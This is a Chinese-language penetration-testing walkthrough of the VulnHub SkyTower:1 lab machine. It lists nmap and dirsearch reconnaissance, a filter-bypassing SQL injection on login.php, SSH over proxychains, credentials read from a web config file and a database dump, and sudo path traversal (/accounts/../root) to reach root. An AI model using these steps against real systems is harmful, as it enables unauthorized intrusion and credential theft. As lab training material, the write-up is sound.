信息收集:
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/
(1)ip扫描
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:54:4A:37'
VirtualBox设置
kali设置
(2)端口扫描
nmap -p- -A 192.168.7.61
(3)目录扫描
dirsearch -u http://192.168.7.61
发现一个login.php文件,访问了一下,发现啥也没有
(4)访问页面,有登录框,测试一下sql注入,将数据包发送到burp上
刚开始测试,发现他会对and、 AND、or、OR、=字符过滤,换成||发现了账号密码:
getshell:
(1)尝试页面登录,发现登录不上,ssh连接试试,发现直接连接连接不上,设置一下代理
vim /etc/proxychains4.conf
(2)现在连接就可以连接上了
proxychains ssh john@192.168.7.61 -t "/bin/sh"
提权:
(1)sudo -l发现没权限
(2)想起来login.php存在sql注入,我们查看一下,发现存在数据库信息
cat /var/www/login.php
(3)尝试登录mysql看看
mysql -u root SkyTech -p
也可以不输入用户名
mysql -u root -p
(4)查看数据库库名
show databases;
(5)查看表名
use SkyTech;
show tables;
(6)查看数据
select * from login;
(7)用sara用户连接
proxychains ssh sara@192.168.7.61 -t "/bin/sh"
(8)再次sudo -l,查看权限
(9)得到/accounts/*有权限
ls ../..
(10)发现accounts在根目录下,我们利用accounts/有权限,查看root下有啥,得到root的密码为theskytower
sudo ls /accounts/../root
sudo cat /accounts/../root/flag.txt
(11)再一次ssh连接,提权成功
proxychains ssh root@192.168.7.61 -t "/bin/sh"